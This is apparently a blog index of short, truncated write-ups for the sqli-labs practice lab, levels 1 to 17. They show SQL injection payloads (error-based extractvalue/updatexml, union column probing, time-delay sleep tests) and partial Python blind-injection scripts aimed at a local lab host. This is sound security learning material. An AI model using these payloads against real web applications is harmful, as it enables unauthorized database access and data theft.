Security Learning: Sqli-Labs
H3rmesk1t
A record of the problems I run into and the things I learn.
less-17 in sqli-labs
Less-17: error-based injection [ ' ]

Testing shows that the injection point is in passwd (a \ in uname produces no response, while a \ in passwd produces an error):

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin'' at line 1

Dump the current database name: 1' and extractvalue(1,concat(0x7e, …

Original · 2021-02-17 18:35:18 · 99 views · 0 comments
less-16 in sqli-labs
Less-16: time-delay injection [ " ]

Automated injection script:

    import requests
    import datetime

    MAXLENGTH = 20
    url = "http://sqli-labs:8080/Less-16/"

    def getLengthOfDatabase():
        for num in range(1,MAXLENGTH):
            payload = "admin\") and if(length(database())=%s,sleep(2),1)#" % num
            # ...

Original · 2021-02-17 14:13:21 · 108 views · 0 comments
less-15 in sqli-labs
Less-15: time-delay injection [ ' ]

Automated injection script:

    import requests
    import datetime

    MAXLENGTH = 20
    url = "http://sqli-labs:8080/Less-15/"

    def getLengthOfDatabase():
        for num in range(1,MAXLENGTH):
            payload = "admin' and if(length(database())=%s,sleep(2),1)#" % num
            # ...

Original · 2021-02-17 14:01:47 · 85 views · 1 comment
less-14 in sqli-labs
Less-14: error-based injection [ " ]

1. Identify the injection point: uname=admin\&passwd=Dumb

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Dumb" LIMIT 0,1' at line 1

updatexml version

2. Use error-based injection to get the database name: uname=admin …

Original · 2021-01-24 22:39:52 · 153 views · 0 comments
less-13 in sqli-labs
Less-13: error-based injection [ ') ]

1. Identify the injection point: uname=admin\&passwd=Dumb

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Dumb') LIMIT 0,1' at line 1

updatexml version

2. Use error-based injection to get the database name: uname=adm …

Original · 2021-01-24 22:20:48 · 101 views · 0 comments
less-12 in sqli-labs
Less-12: union query [ ") ]

Original · 2020-12-17 00:22:42 · 151 views · 0 comments
less-11 in sqli-labs
Less-11: union query [ ' ]

Original · 2020-12-17 00:14:00 · 107 views · 0 comments
less-10 in sqli-labs
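Less-10: time-delay injection [ " ]

First test for the injection point. Many attempts return the same response, but with ?id=1" and sleep(5) --+ the page responds only after a delay, which suggests time-based blind injection delimited by ". The blind-injection script is basically the same as for less-9; just change the url.

Solution script:

    # less-9
    url = "http://sqli-labs:8080/Less-9/?id=1' "
    # less-10
    url = 'http://sqli-labs:8080/Less-10/?id=1" '
    import req …

Original · 2020-12-16 23:49:49 · 121 views · 0 comments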
less-9 in sqli-labs
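Less-9: time-delay injection [ ' ]

First test for the injection point. Many attempts return the same response, but with ?id=1%27%20and%20sleep(5)%20--+ the page responds only after a delay, which suggests time-based blind injection delimited by '.

Solution script:

    import requests
    import time
    import datetime

    MAXLENGTH = 20
    url = "http://sqli-labs:8080/Less-9/?id=1%27 "

    def getLengthOfDatabase():
        for num in …

Original · 2020-12-16 23:37:43 · 129 views · 0 comments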
less-2 in sqli-labs
Less-2: union query [ ]

Check how many columns are returned:

    http://sqli-labs:8080/Less-2/?id=1%20order%20by%204%20--+
    Unknown column '4' in 'order clause'

    http://sqli-labs:8080/Less-2/?id=1%20order%20by%203%20--+
    Your Login name:Dumb Your Password:Dumb
    # 3 columns are returned

Find the displayed positions:

    http://sqli-labs:8080/Les …

Original · 2020-12-15 19:35:05 · 101 views · 0 comments
less-8 in sqli-labs
To simulate a CTF-style SQL injection, I added a flag field to the database myself.

Blind injection script:

    import requests
    import string

    # Determine the length of the database
    punctuation = string.punctuation
    digits = string.digits
    ascii_letters = string.ascii_letters
    compare_str = ascii_letters + digits + punctuation
    url = "http://sqli-labs:8080/Less-8/? …

Original · 2020-12-15 14:40:17 · 98 views · 0 comments
less-1 in sqli-labs
Less-1: union query [ ' ]

Check how many columns are returned:

    http://sqli-labs:8080/Less-1/?id=1%27%20order%20by%204%20--+
    Unknown column '4' in 'order clause'

    http://sqli-labs:8080/Less-1/?id=1%27%20order%20by%203%20--+
    Your Login name:Dumb Your Password:Dumb
    # 3 columns are returned

Find the displayed positions:

    http://sqli-labs …

Original · 2020-12-15 19:23:41 · 91 views · 0 comments
less-5 in sqli-labs
less-5: error-based injection with extractvalue

    ?id=1' --+
    You are in........... # no useful information; consider error-based injection

    ?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+
    XPATH syntax error: '~security~'

    ?id=1' and extractvalue(1,concat(0x7e,(select table_name from information_s …

Original · 2020-12-06 21:30:11 · 79 views · 0 comments